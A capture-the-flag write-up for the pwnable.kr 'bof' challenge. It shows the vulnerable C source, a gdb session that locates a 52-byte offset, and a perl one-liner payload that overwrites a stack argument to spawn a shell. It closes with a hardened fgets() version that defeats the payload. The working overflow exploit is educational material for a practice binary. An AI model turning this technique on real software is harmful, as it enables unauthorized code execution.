
bof WriteUp (pwnable.kr bof): a simple buffer-overflow exploitation


After downloading the source and binary from the link, the source reads as follows:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);   // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}

int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}

This is clearly a buffer-overflow challenge. The vulnerability exists because gets() performs no length check on the input, so the 32-byte buffer can be overflowed. Let's analyse it in gdb.

root@kali-linux:~/文件/PWN/pwnable.kr/3.bof# gdb -q ./bof

warning: build/bdist.linux-x86_64/wheel/peda/peda.py: No such file or directory
Reading symbols from ./bof...(no debugging symbols found)...done.
gdb-peda$ pattern_creat 150
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA'
gdb-peda$ r
Starting program: /root/文件/PWN/pwnable.kr/3.bof/bof
overflow me : AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA
Nah..
*** stack smashing detected ***: /root/文件/PWN/pwnable.kr/3.bof/bof terminated

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x31414162 ('bAA1')
EBX: 0xf7fcf000 --> 0x1bef0
ECX: 0xffffd210 ("AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA")
EDX: 0xf7ffd4fc --> 0x0
ESI: 0xffffc9e0 --> 0x0
EDI: 0xffffc9e0 --> 0x0
EBP: 0xffffcab8 --> 0xffffcb18 --> 0xf7fa4000 --> 0x1b2db0
ESP: 0xffffc910 --> 0x40000000 ('')
EIP: 0xf7fc6886 (cmp WORD PTR [eax],0xb858)
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xf7fc687e: xchg   ax,ax
   0xf7fc6880: mov    ecx,DWORD PTR [eax+0x48]
   0xf7fc6883: mov    eax,DWORD PTR [eax+0x4c]
=> 0xf7fc6886: cmp    WORD PTR [eax],0xb858
   0xf7fc688b: je     0xf7fc6b28
   0xf7fc6891: cmp    BYTE PTR [eax],0xb8
   0xf7fc6894: jne    0xf7fc68b0
   0xf7fc6896: cmp    DWORD PTR [eax+0x1],0xad
[------------------------------------stack-------------------------------------]
0000| 0xffffc910 --> 0x40000000 ('')
0004| 0xffffc914 --> 0x0
0008| 0xffffc918 --> 0xffffc960 --> 0x0
0012| 0xffffc91c --> 0xf7fcf000 --> 0x1bef0
0016| 0xffffc920 --> 0x0
0020| 0xffffc924 --> 0x0
0024| 0xffffc928 --> 0x0
0028| 0xffffc92c --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xf7fc6886 in ?? () from /lib/i386-linux-gnu/libgcc_s.so.1
gdb-peda$ pattern_offset AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgA
AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgA found at offset: 52

So the offset to the overwritten value is 52 bytes. In the source code:

if(key == 0xcafebabe){
    system("/bin/sh");
}

We need to overwrite the memory holding key with 0xcafebabe. The file command shows that the program is a 32-bit binary, which means little-endian byte order, so the overflow input is simply "A"*52 + "\xbe\xba\xfe\xca".

root@kali-linux:~/文件/PWN/pwnable.kr/3.bof# file bof
bof: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=ed643dfe8d026b7238d3033b0d0bcc499504f273, not stripped

PoC:

(perl -e 'print "A"x52 . "\xbe\xba\xfe\xca\n"'; cat -) | ./bof

This spawns /bin/sh, from which we can cat the flag:

daddy, I just pwned a buFFer :)
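As a defensive counterpart to the write-up, here is an added example (not the challenge's or the author's code) of the same function with gets() replaced by a bounded fgets() read, fed the exact 56-byte payload from the PoC above. fmemopen() stands in for stdin so the program runs offline; func_hardened and run_payload_against_hardened are names chosen for this example. One caveat worth noting from the gdb output: the "stack smashing detected" message shows the binary was built with a stack canary, but the canary is only checked when func() returns, and in the original the key comparison and system() run before that return, so the canary does not protect the overwritten argument. Bounding the read does.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 32

/* Hardened counterpart of the challenge's func() (added example, not the
   challenge's own code). fgets() stores at most BUF_SIZE-1 bytes plus a NUL,
   so no input length can reach past overflowme[] to the canary, the saved
   return address or the key argument. Returns 1 if the key check would pass,
   0 otherwise. copy_out (BUF_SIZE bytes, may be NULL) receives what was read,
   so callers can see how much of the input actually landed in the buffer. */
int func_hardened(FILE *in, unsigned int key, char *copy_out)
{
    char overflowme[BUF_SIZE];

    if (fgets(overflowme, sizeof overflowme, in) == NULL)
        overflowme[0] = '\0';

    if (strchr(overflowme, '\n') == NULL) {
        /* No newline stored: the line was longer than the buffer. Discard
           the remainder so it is not consumed by the next read. */
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    } else {
        overflowme[strcspn(overflowme, "\n")] = '\0';
    }

    if (copy_out != NULL)
        strcpy(copy_out, overflowme);   /* fits: strlen < BUF_SIZE */

    return key == 0xcafebabe;
}

/* Feed the write-up's payload ("A"*52 + 0xcafebabe little-endian + newline),
   constructed inline here, to the hardened function with the original key
   0xdeadbeef. Returns the key-check result; *stored_len receives the number
   of payload bytes that ended up in the buffer. Returns -1 on setup failure. */
int run_payload_against_hardened(size_t *stored_len)
{
    char payload[57];
    memset(payload, 'A', 52);
    payload[52] = '\xbe'; payload[53] = '\xba';
    payload[54] = '\xfe'; payload[55] = '\xca';
    payload[56] = '\n';

    FILE *in = fmemopen(payload, sizeof payload, "r");
    if (in == NULL)
        return -1;

    char copy[BUF_SIZE];
    int passed = func_hardened(in, 0xdeadbeef, copy);
    fclose(in);

    if (stored_len != NULL)
        *stored_len = strlen(copy);
    return passed;
}

int main(void)
{
    size_t n = 0;
    int passed = run_payload_against_hardened(&n);
    printf("key check passed: %d, bytes stored in buffer: %zu\n", passed, n);
    return 0;
}
```

With the bounded read only 31 bytes of the 56-byte payload are stored, the four bytes meant for key never leave the input stream, and the check against 0xcafebabe fails as intended. The drain loop matters in real code: without it, the leftover "A"s and the 0xcafebabe bytes would be handed to whatever reads stdin next.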